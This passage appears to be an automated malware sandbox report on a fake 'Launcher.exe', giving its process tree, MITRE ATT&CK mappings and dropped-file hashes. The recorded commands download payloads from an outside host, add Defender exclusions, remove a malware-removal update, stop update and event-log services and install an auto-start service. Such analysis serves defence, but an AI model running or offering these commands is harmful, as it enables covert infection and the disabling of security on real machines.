  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2136 /prefetch:3
  2⤵
  PID:680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2128,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2380 /prefetch:8
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3132 /prefetch:1
  2⤵
  PID:380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4632,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4536 /prefetch:8
  2⤵
  PID:4596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4300 /prefetch:8
  2⤵
  PID:4356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4832,i,13477801979242511814,17417431625219028360,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:8
  2⤵
  - Drops file in System32 directory
  PID:3444

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4248,i,15436195446242760253,4000484513008731869,262144 --variations-seed-version --mojo-platform-channel-handle=1308 /prefetch:8
1⤵
PID:1588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3132

C:\Users\Admin\Desktop\New folder\Launcher.exe
"C:\Users\Admin\Desktop\New folder\Launcher.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:748
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4208
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5108
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2264
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4604
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1308
    - - C:\Users\Admin\AppData\Roaming\services\plugin31849
        
        C:\Users\Admin\AppData\Roaming\services\plugin31849
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4596
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 612
        6⤵
        Program crash
        
        PID:4324
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4848
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1128
    - - C:\Users\Admin\AppData\Roaming\services\2plugin28438
        
        C:\Users\Admin\AppData\Roaming\services\2plugin28438
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1772
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2392
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:556
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:1640
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4008
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4760
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:1512
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:432
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:4332
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:4348
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3316
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3752
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:2980
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:2104
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:4908
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:408
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3544
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:1584
    - - C:\Users\Admin\AppData\Roaming\services\3plugin13200
        
        C:\Users\Admin\AppData\Roaming\services\3plugin13200
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:5008
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 856
        6⤵
        Program crash
        
        PID:2104
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 904
        6⤵
        Program crash
        
        PID:4612
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 972
        6⤵
        Program crash
        
        PID:3680
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1028
        6⤵
        Program crash
        
        PID:4624
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1032
        6⤵
        Program crash
        
        PID:2024
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1012
        6⤵
        Program crash
        
        PID:408
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1212
        6⤵
        Program crash
        
        PID:2396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1240
        6⤵
        Program crash
        
        PID:388
      - C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1832
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 688
        7⤵
        Program crash
        
        PID:4908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 708
        7⤵
        Program crash
        
        PID:1336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 716
        7⤵
        Program crash
        
        PID:4472
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 896
        7⤵
        Program crash
        
        PID:4676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 928
        7⤵
        Program crash
        
        PID:4848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 928
        7⤵
        Program crash
        
        PID:432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 988
        7⤵
        Program crash
        
        PID:2524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 1048
        7⤵
        Program crash
        
        PID:944
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 1056
        7⤵
        Program crash
        
        PID:388
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 1396
        7⤵
        Program crash
        
        PID:2392
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 1328
        7⤵
        Program crash
        
        PID:4676
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 1516
        6⤵
        Program crash
        
        PID:3392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4080

C:\Users\Admin\Desktop\New folder\Launcher.exe
"C:\Users\Admin\Desktop\New folder\Launcher.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1588

C:\Users\Admin\Desktop\New folder\Launcher.exe
"C:\Users\Admin\Desktop\New folder\Launcher.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4596 -ip 4596
1⤵
PID:3688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5008 -ip 5008
1⤵
PID:3956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5008 -ip 5008
1⤵
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5008 -ip 5008
1⤵
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5008 -ip 5008
1⤵
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5008 -ip 5008
1⤵
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5008 -ip 5008
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5008 -ip 5008
1⤵
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5008 -ip 5008
1⤵
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5008 -ip 5008
1⤵
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1832 -ip 1832
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1832 -ip 1832
1⤵
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1832 -ip 1832
1⤵
PID:2488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1832 -ip 1832
1⤵
PID:512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1832 -ip 1832
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1832 -ip 1832
1⤵
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1832 -ip 1832
1⤵
PID:2780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1832 -ip 1832
1⤵
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1832 -ip 1832
1⤵
PID:3996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1832 -ip 1832
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1832 -ip 1832
1⤵
PID:2292

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3700
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2712
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4420
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1132
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1320
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2476
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1448
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4804
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1480
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4348
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:816

C:\Users\Admin\Desktop\New folder\Launcher.exe
"C:\Users\Admin\Desktop\New folder\Launcher.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2232

C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3bca58cece\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4080
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 436
  2⤵
  - Program crash
  PID:3444

C:\Users\Admin\Desktop\New folder\Launcher.exe
"C:\Users\Admin\Desktop\New folder\Launcher.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4080 -ip 4080
1⤵
PID:1304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
384B

MD5
dce81e94c86767de133fce239e56e0f4

SHA1
28413a731bd4ae905367ca5ae06b4a0b37e63ae6

SHA256
7db75d3ef30f1d2e37e23b70bde9eabb7f0a122680a0644fa18acb196c96f2a4

SHA512
9afc7b29f4a8bdb8fb5c884d0223b8803b2ee5dacc24c578bd47ac2d1a11470d022f14312ab976bc8f57ac519367daa5cc822ccf363504f2dca8907f07e2ec81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
1b617f9841d1dc4a7d14c1186540d758

SHA1
5415d889ae005d09f63198861b2b18d4ea3ad1db

SHA256
b85db1a4dd7699fd3c5f537a97525f5900889bd521b68fb5553fc2ac2c31a63b

SHA512
09257df30a324a899c9b7970fccac48c5fae56c248639f704d15c8f5c72a11b1714aaf9ddd5fb0539e739a168aca8925bfd2346a39d622da11ed7edd02e8a670

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
521B

MD5
ecfdd3baff461bb92deec5f7d29bb94f

SHA1
c420e2b327de281661dc251db5a0109430c52cb1

SHA256
80348eee181872bf9e5f1a7c974ff327898991bfe99aa2d8ce42b19e49b57a41

SHA512
b2acae8b41c6cff633ab975ac81b4b8378c49548da0dc025b20561f981f8694e13e22a476ff636e256c79dff01d26c4d5fde29d038e14af9c6980b1cf5aee42b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
eaf432ced64e7148e242c666398468c8

SHA1
bb7fa6d01d974b08188cc19718c87fe5a926a8ab

SHA256
0b39d69be35ae830d2182f7cc54e3bd541ae65aff275b9039020faae54150cd1

SHA512
1cdab1ad57f7a917364ed2fad99a36067edb4987209b35d49325c054ebebac316381d1e06979c2ed0573351bd43f279024403c8521be245c99d64892185da475

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
d69ddb4382ea39b6f45331260f137f6e

SHA1
163aae4c0d0619ccef7cfb98972db12928a56411

SHA256
41812e266e857a2801ce9d381728ec5afbb7058c5ba86dd377e37c731c910e3a

SHA512
bdc06a1d15f511ffa841b347939fda89845dc9a4e04b98dc45a84c61e2821c6c7576b5278ed0fe524947123cd2df73b7bb3df4fb8b3f08c0d3d7633f9d2ae1a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
82bd2e7f3b7336d3f80fb9cc77f38caa

SHA1
bdf422bd534437a78bb0c572ce6c2e9d8452cc5b

SHA256
9fffed11531d457f9d0d8de4cf56ea1093199ca5ecda22cef2b7e5d73b0147df

SHA512
bb674738a43e1d460923791c6f608976cf9bd959aeb7b0010949ffa0a56201c0f79ead036d27f58e9993d7c0fe457bc7f989121f6b4aa4b842cd203115407fc8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
56bf1426164196b5b90f190b58b3abd2

SHA1
a810cb3dd14196508b9055d655669c0c02c8c341

SHA256
bb80d4f68d551c274735aeccf7964039f4d26c5d77cc21edc44d1beb50c0864a

SHA512
4001816bb686d62b14158934bd79d4d0d884bd25fa42f2b1699d7e52c22db15a3aabca564ed00a94a101638a449ec938b2b171148c1f8bfaa5fd821c507a3332

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
c1398854bfe192579352f180cf4b93df

SHA1
0689e1030937c5816a4fa7c5085e2d95aed1b8b4

SHA256
5023c97b3dc770f0bfc3f2f8fd00c69806b50d55c3ef4b31a0b612dada90fa24

SHA512
fcd71ddf1f7fb9acff0f68375fb29e074c40b2e610cf35ee5aa2d3374fcc371ed399b1d3054a2b56deb846a65f2e292d8241878a1bca2730125a6d5c0f41034a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
35b53718fadfda5ac6c9dcb130da5fb1

SHA1
f6719a68739a049d858fc80293be1543c850634a

SHA256
4220d6c5915299fb25bdb333dda9ab1eb6658b2758fb656599fa67e36d466820

SHA512
b169bbc4ce48f38c3a3fb271ef9dea4239599fba91173d82237a836e6e80c97ac9d3ae7af31e0cde6369badaec0fe21ed367e643c7fcd66495a21ad5e44c1d32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
06b8510e50d0a9c8bd2094936c1f2c49

SHA1
002e127f5e114eeccee3c203769a55e6c97f9219

SHA256
f6f5e0a2de12ac78b86bfe6f5f5f76c4bc7efdad977993b91d761d0cb0510fcb

SHA512
0785740acf8f7663d84b88c2b78b6d2ce9911efb0b183d869e648a7ce792a696da581898be687d6838cd913921d3d2347beebc3e356de4ce4a9a6f75b9a1b92a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
8a06715f5c31440bc774ef5a2b2cbcd2

SHA1
9faef5c8cdafb4821781c62db08e34b15a5de5f5

SHA256
e303caca65900914f8805d3c01555e5f264a0bddbfd8c7b02a5cee256add424c

SHA512
028ad408387ad6c72feacd14bcb453781c8d8a18da9747fcdacc4f5b1fb88bd519c408895ff4c170340b8844a9cc07fb359c4a9570ce8ee254323b2ef7a67556

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
609f080f1ef9e959c97f066725fe9464

SHA1
0eb5b6576e1112daec3f69bc3193f4bd6f414317

SHA256
0e23e84edc6c29ae9d3d9cbb3f72baec2f568234b5cea3e4c2f3b480e4c59401

SHA512
86f96ffedf1878dd127448a012142497230e2a20d6fa0132f9712e855c5a82aa9bd8f7141de7aa88be4fe26020555cba9b3999064a0250a135242686021a5ddc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
1720d7f881e7abe771e3f4758cae0589

SHA1
a7197d601f61599bc994c512ac8c7bb5776ae3ec

SHA256
64c4be8369e27f192cb69dbce83a00def9beef85e15cfa3461599ae1a69cfbd0

SHA512
